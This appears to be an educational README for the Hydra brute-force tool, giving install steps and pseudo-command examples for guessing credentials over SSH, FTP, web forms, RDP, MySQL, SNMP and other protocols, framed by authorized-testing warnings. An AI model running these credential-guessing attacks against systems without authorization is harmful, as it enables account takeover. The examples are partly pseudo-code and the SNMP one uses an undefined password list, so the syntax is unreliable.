Hydra – Brute-Force Testing Tool (EDU)

Offensive Security Examples by Volkan Sah – Updated 2025

Warning

This tool is for educational purposes only. Performing brute-force attacks without permission is illegal and unethical. Use this information responsibly on systems you are authorized to test.

Hydra is a powerful brute-force framework for testing password security across multiple protocols. This EDU version keeps your examples, simplifies usage, and adds modern clarity for 2025 learners.

---

Table of Contents

• Introduction

• Installation

• Basic Usage

• Examples

  • SSH Brute Force
  • FTP Brute Force
  • Web Form Brute Force
  • SMTP Brute Force
  • MySQL Brute Force
  • RDP Brute Force
  • Telnet Brute Force
  • HTTP Basic Authentication
  • VNC Brute Force
  • SNMP Brute Force

• Best Practices

• Contributing

• Credits

• License

---

Introduction

Hydra allows security testers to identify weak passwords across multiple protocols (SSH, FTP, HTTP, RDP, MySQL, VNC, SNMP, and more). This EDU version provides pseudo-examples for learning brute-force techniques safely.

---

Installation

git clone https://github.com/vanhauser-thc/thc-hydra
cd thc-hydra
./configure
make
sudo make install

---

Basic Usage

# Brute-force with username list and password list
hydra -L usernames.txt -P passwords.txt target_ip protocol

---

Examples

SSH Brute Force

target_ip = "192.168.1.1"
protocol = "ssh"
username_list = ["admin", "user", "test"]
password_list = ["password123", "admin", "123456"]
hydra -L username_list -P password_list target_ip protocol

FTP Brute Force

target_ip = "192.168.1.2"
protocol = "ftp"
username_list = ["ftpuser", "anonymous"]
password_list = ["ftp123", "anonymous"]
hydra -L username_list -P password_list target_ip protocol

Web Form Brute Force

target_url = "http://example.com/login"
protocol = "http-post-form"
username_list = ["admin", "user"]
password_list = ["admin123", "password"]
form_parameters = "/login:username=^USER^&password=^PASS^:Invalid username or password"
hydra -L username_list -P password_list target_url protocol form_parameters

SMTP Brute Force

target_ip = "192.168.1.3"
protocol = "smtp"
username_list = ["[email protected]", "[email protected]"]
password_list = ["admin123", "password"]
hydra -L username_list -P password_list target_ip protocol

MySQL Brute Force

target_ip = "192.168.1.4"
protocol = "mysql"
username_list = ["root", "admin"]
password_list = ["rootpass", "adminpass"]
hydra -L username_list -P password_list target_ip protocol

RDP Brute Force

target_ip = "192.168.1.5"
protocol = "rdp"
username_list = ["Administrator", "User"]
password_list = ["admin123", "password"]
hydra -L username_list -P password_list target_ip protocol

Telnet Brute Force

target_ip = "192.168.1.6"
protocol = "telnet"
username_list = ["root", "admin"]
password_list = ["toor", "admin123"]
hydra -L username_list -P password_list target_ip protocol

HTTP Basic Authentication Brute Force

target_url = "http://example.com/protected"
protocol = "http-get"
username_list = ["admin", "user"]
password_list = ["admin123", "password"]
hydra -L username_list -P password_list target_url protocol

VNC Brute Force

target_ip = "192.168.1.7"
protocol = "vnc"
password_list = ["password", "vncpass"]
hydra -P password_list target_ip protocol

SNMP Brute Force

target_ip = "192.168.1.8"
protocol = "snmp"
community_list = ["public", "private"]
hydra -L community_list -P password_list target_ip protocol

---

Best Practices

• Only test systems you are authorized to test.
• Use strong passwords for your own services.
• Keep Hydra updated for latest protocol support.
• Avoid using real production systems for testing; use labs or VMs.

---

Contributing

PRs and issues welcome for EDU improvements.

---

Credits

Hydra developed by van Hauser and contributors.

---

License

GNU AFFERO GENERAL PUBLIC LICENSE